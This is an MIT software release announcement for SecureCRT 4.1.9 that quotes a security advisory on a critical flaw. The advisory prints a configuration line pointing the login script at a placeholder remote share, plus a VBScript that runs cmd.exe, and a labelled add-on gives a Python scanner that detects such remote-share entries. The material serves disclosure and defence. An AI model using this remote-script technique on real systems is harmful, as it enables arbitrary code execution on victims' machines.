[WinPartners] SecureCRT 4.1.9 Release Announcement
Atticus Gifford
atticus at MIT.EDU
Thu Dec 2 14:55:23 EST 2004
Date: Thursday, 2 December 2004
To: MIT Community: itpartners at mit.edu, winpartners at mit.edu,
sw-release-announce at mit.edu, kakapo at mit.edu
Cc: itag at mit.edu, is&t at mit.edu
From: Software Release Team
Subject: SecureCRT 4.1.9 Release Announcement
Good Afternoon,
On behalf of the SecureCRT Release Team, I am pleased to announce the
release of SecureCRT 4.1.9. This update to SecureCRT includes a fix for
a critical vulnerability in earlier versions of SecureCRT. It is
recommended that all users update immediately to this latest version.
For more information on the security threat patched in this version of
SecureCRT please see the MIT IT Security Support Security Advisory
copied at the end of this message.
This new installer also fixes several bugs in the SecureCRT 4.1.4
installer, particularly for user accounts running SecureCRT other than
the administrator who installed the software.
Notable Features of SecureCRT 4.1.9:
---------------------------------
- Includes 4.1.9 binaries with critical security patch
- Adds path to VSH and VCP to PATH variable (for users who would like
to use the command line)
- First-time users (i.e. anyone but the account that installed
SecureCRT) will only see a quick, one-time repair that doesn't require
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files
folder will create (and ask to overwrite if it exists) a shortcut to
Athena. This is instead of creating a shortcut via repair. Only the
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer
(click Options... button)
Known Issues:
-------------
There are no known issues for this version of KfW.
How to Obtain:
--------------
You can download SecureCRT 4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Getting Help:
-------------
The SecureCRT 4.1.9 page is located at:
http://itinfo.mit.edu/product?vid=623
If you have a question or need assistance, please contact the Computing
Help Desk at computing-help at mit.edu or x3-1101.
Thanks,
Atticus
----------------
Atticus Gifford
Installer Writer - Software Release Team
Information Services and Technology (IS&T)
Massachusetts Institute of Technology
Room W92-176
Cambridge, MA 02139
t: 617-452-2095
m: atticus at mit.edu
------------ MIT ITSS Security Advisory -----------
From: mvan at MIT.EDU
Subject: Security Advisory: Critical SecureCRT for Windows
Vulnerability
Date: December 2, 2004 12:52:31 PM EST
To: security-fyi at mit.edu
Cc: itss at mit.edu, swrt at mit.edu
Greetings,
Please be aware of the following security threat concerning SecureCRT
V4.1 and earlier, and see below for further details:
=============================================================
Date: November 23, 2004
Advisory: NTBugtraq Advisory
Affected: SecureCRT V4.1, V4.0 (and probably lower)
Impact: All Windows platforms using SecureCRT -- Critical
Action to Take: Update to Secure CRT V4.1.9
=============================================================
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Notable Features of SecureCRT V4.1.9:
------------------------------
- Includes 4.1.9 binaries
- Adds path to VSH and VCP to PATH variable (for users who would like
to use the command line)
- First-time users (i.e. anyone but the account that installed
SecureCRT) will only see a quick, one-time repair that doesn't require
the installer to be on the user's system
- New "Create Athena Shortcut" item in the SecureCRT Program Files
folder will create (and ask to overwrite if it exists) a shortcut to
Athena. This is instead of creating a shortcut via repair. Only the
installing account will have this shortcut automatically.
- Running the "Create Athena Shortcut" item will allow the user to
create a GSSAPI (Kerberos Tickets) shortcut to Athena if they prefer
(click Options... button)
Known Issues:
-------------
There are no known issues for this version of SecureCRT 4.1.9.
How to Obtain:
--------------
You can download Secure CRT V4.1.9 from the MIT IS&T Windows Software
Site: https://web.mit.edu/software/win.html. Please note that you need
a current personal certificate to download this software. If you do not
have a current personal certificate, then you can obtain one from
https://ca.mit.edu/.
Getting Help:
-------------
If you have a question or need assistance, please contact the Computing
Help Desk at computing-help at mit.edu or x3-1101.
Further Details on the Exploit:
--------------
There appears to be some filtering around the use of \ in the
url->command line parsing, that prevents the specification of an SMB
share to use for configuration. This can be easily bypassed and leads
to the loading of a configuration file from a remote site.
The configuration file contains an entry that specifies the login
script to run, which can be set to a file on the remote share:

    S:"Script Filename"=\\ipofshare\share\folder\scriptname

And the login script can then contain scripting such as:

    # $language = "VBScript"
    # $interface = "1.0"
    Sub Main
        dim wshShell, boolErr, strErrDesc
        Set wshShell = CreateObject("WScript.Shell")
        run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True)
    End Sub
Mark Van Dyke
IT Security Support
MIT Information Services & Technology
mvan at mit.edu
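
Added example, not part of the original message or of any MIT or vendor tooling: a defender-side check that scans SecureCRT session files for a "Script Filename" entry pointing at a remote (UNC) share, the configuration condition the advisory describes. The S:"Name"=value form is taken from the advisory; the sample sessions, the S:"Hostname" line, the addresses and the directory passed to audit_tree are constructed assumptions.

```python
import os
import re

# String settings look like  S:"Name"=value  (the form shown in the advisory).
SETTING_RE = re.compile(r'^\s*S:"(?P<name>[^"]+)"=(?P<value>.*)$')

def remote_host(value):
    """Return the host of a UNC path such as \\\\host\\share\\x, else None."""
    # Windows accepts '/' as a separator too, so normalise before testing.
    path = value.strip().strip('"').replace("/", "\\")
    if not path.startswith("\\\\"):
        return None
    host = path[2:].split("\\", 1)[0]
    return host or None

def audit_session(text, source="<memory>"):
    """List (source, line number, host, value) for remote login scripts."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SETTING_RE.match(line)
        if not m or m.group("name").lower() != "script filename":
            continue
        host = remote_host(m.group("value"))
        if host:
            findings.append((source, lineno, host, m.group("value").strip()))
    return findings

def audit_tree(root):
    """Audit every .ini file under root (a hypothetical config directory)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".ini"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += audit_session(fh.read(), path)
    return findings

# Constructed sample sessions; host names and addresses are placeholders.
SAMPLE_LOCAL = ('S:"Hostname"=host.example.org\n'
                'S:"Script Filename"=C:\\scripts\\login.vbs\n')
SAMPLE_REMOTE = ('S:"Hostname"=host.example.org\n'
                 'S:"Script Filename"=\\\\192.0.2.10\\share\\folder\\login.vbs\n')
SAMPLE_SLASH = 'S:"Script Filename"=//192.0.2.10/share/folder/login.vbs\n'

if __name__ == "__main__":
    for sample in (SAMPLE_LOCAL, SAMPLE_REMOTE, SAMPLE_SLASH):
        print(audit_session(sample))
```

A finding is a prompt to review the session file, since a site may legitimately keep login scripts on an internal file server.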